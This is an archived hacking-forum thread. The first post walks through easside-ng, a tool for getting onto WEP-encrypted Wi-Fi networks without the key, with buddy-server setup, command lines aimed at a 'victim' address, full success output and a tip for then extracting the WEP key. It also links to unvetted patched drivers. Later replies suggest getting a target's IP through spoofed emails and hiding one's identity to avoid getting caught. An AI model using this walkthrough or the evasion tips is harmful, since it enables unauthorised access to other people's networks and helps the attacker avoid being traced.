Aircrack-ng new tools Using easside-ng on bt2

[drgr33n]

Hey guys

Because I've now got my atheros card writing prga's properly I've been able to test these new tools Here is a link to my patched drivers for atheros cards, it is a dirty fix until madwifi guys sort it but works fine for me and a few privileged friends that have the skill . Just download make and make install


NEW DRIVERS v1.2 27-11-07

http://www.mediafire.com/?5z1tl4tchmq

easside-ng is described as a wep magic wand tool for connecting to wep encrypted wireless networks without a WEP key. It does this by sniffing packets from a legit user and uses these packets and the PRGA (pseudo random generation algorithm) xor data to encrypt new viable packets.

easside-ng works in two stages. First thing easside has to establish basic connectivity between easside-ng, buddy server and the access point. Once achieved easside-ng will attempt to communicate with the WIFI network. If successful you should be able to connect to the router and do just about anything .

Aircrack-ng guys describe this tool as stable but I wouldn't doesn't work all the time and it only works with open authentication systems.

Another downside is easside-ng and wesside-ng are useless at guessing the ip addys at the mo so for testing purposes you may benefit telling easside-ng what ip addys to use. This is because easside-ng uses .1 as default for the last digit in the users IP and .123 for the routers. Another point is easside-ng requires a valid client using the internet and not just static.

Enough with the rabbling more info at http://aircrack-ng.org/doku.php?id=easside-ng now lets begin

First thing to do is setup a buddy server.

Code:

buddy-ng

It should respond

Code:

 buddy-ng
 Waiting for connexion

Now check your buddy server is running open up a internet browser and type in the address bar

Code:

http://127.0.0.1:6969

Go back to the buddy window and you should now see

Code:

 Waiting for connexion
 Got connection from 127.0.0.1
 That was it !
 Waiting for connexion

If you see this excellent we are ready for easside-ng this example is using the ip addy's required. This is because I know the ip pool and subnet. Easside-ng can guess the ip pool and gateway but as default it adds .123 to the end of the gateway and .1 to the ip address.

Code:

mkdir temp
cd temp
modprobe tun
easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64

Lets break it down

-s is the ip addy of the buddy server (you)
-f is the adaptor I am using
-r is the ip addy of the router
-v is the mac addy of the router
-i is the victims ip addy

Now if the hack was successful you should see the following on easside-ng shell

Code:

drgr33n crap # easside-ng -f ath1 -s 127.0.0.1 -r 192.168.1.254 -v 00:18:F6:79:1E:51 -i 192.168.1.64
Setting tap MTU
Sorting out wifi MAC
MAC is 00:01:02:EC:8F:1A
Setting tap MAC
[14:15:45.929815] Ownin...
Chan 07
SSID Hack-me Chan 7 Mac 00:DE:ff:00:ff:00
Sending auth request
Authenticated
Sending assoc request
Associated: 1
Unknown mgmt subtype 30
Assuming ARP 36
[14:16:11.424675] Got 22 bytes of PRGA IV [E3:67:7D]
[14:16:11.430123] Got 58 bytes of PRGA IV [E5:67:7D]
[14:16:11.539501] Got 166 bytes of PRGA IV [E8:67:7D]
[14:16:11.660668] Got 490 bytes of PRGA IV [E9:67:7D]
[14:16:11.784641] Got 1462 bytes of PRGA IV [EA:67:7D]
[14:16:12.027078] Got 1504 bytes of PRGA IV [EC:67:7D]
Sending who has 192.168.1.254 tell 192.168.1.64
Rtr MAC 00:ff:00:ff:77:F0
Trying to connect to buddy: 127.0.0.1:6969
Connected
Handshake compl33t
Checking for internet... 1
Checking for internet... 2
Checking for internet... 3
Internet w0rx.  Public IP 127.0.0.1
Rtt 82ms

Now bring your virtual network deice up

Code:

ifconfig at0 up

And you should be rockin

Another cool thing is you can use easside's prga data with wesside just navigate to the same temp folder and run wesside-ng to flood the network and grab the wep key. Aircrack cru are calling this "besside-ng" lol

Enjoy

[solution]

nice one

but so weird that my alfa usb adapter can´t do this :'(

greetings

[purehate]

I just don't see how this is useful at all. I would love for someone to explain how this can be used that other tools dont do much better. For one How am I going to know the victim IP If I'm out side the LAN.

[-=Xploitz=-]

I just don't see how this is useful at all. I would love for someone to explain how this can be used that other tools dont do much better. For one How am I going to know the victim IP If I'm out side the LAN.

E-mail receipt from victim?


***EDIT***

-OR-

If it's WEP encrypted, use Korek Chopchop method to get it.

[imported_spankdidly]

E-mail receipt from victim?

LOL!

"Dear Dumb Hacker, You used your tool against my Wireless Lan, but it's not 192.168.1.1, it's 192.168.100.1, You noob, get it right the next time you hack into my wifi!"

Love always, Your Neighbor.

[-=Xploitz=-]

LOL!

"Dear Dumb Hacker, You used your tool against my Wireless Lan, but it's not 192.168.1.1, it's 192.168.100.1, You noob, get it right the next time you hack into my wifi!"

Love always, Your Neighbor.

LOL!!


But on the serious side..did you see my edit?

Thats the only real way I can think of accomplishing this unless you use Kismet,.... or,.... open a capture in Wireshark maybe and search for the IP,.. or you actually do a spoofed email, and request a delivery return receipt.

BTW..I was kinda serious about the whole E-mail return receipt thing. If you send someone an Email..you can (with some Email clients) request a return receipt..much like our forums PM system is setup...and get their IP that way. I just don't suggest using your real E-mail address if your a wanna be blackhat..because you could get caught and you could get into trouble.

[drgr33n]

lol it should guess the ip and gateway but its rubbish might be because of my dirty drivers now uploading v1.1 with support for much more cards.

[purehate]

This is exactly my point. Why go through all this crap when wep can be broken almost as fast as I can type the commands.

[drgr33n]

because I'm doing a uni course and this is going to score me extra points but yes I see your point purehate aircrack will crack 64 bit wep with around 10000 ivs

[imported_spankdidly]

This is exactly my point. Why go through all this crap when wep can be broken almost as fast as I can type the commands.

I think it was more of a "See, this is what else we can do with wep". Of course it's more of a hassle to do it that way. It doesn't make sense. But I'm sure somebody felt pretty cool when they figured it out. It is cool, but there's no need for it.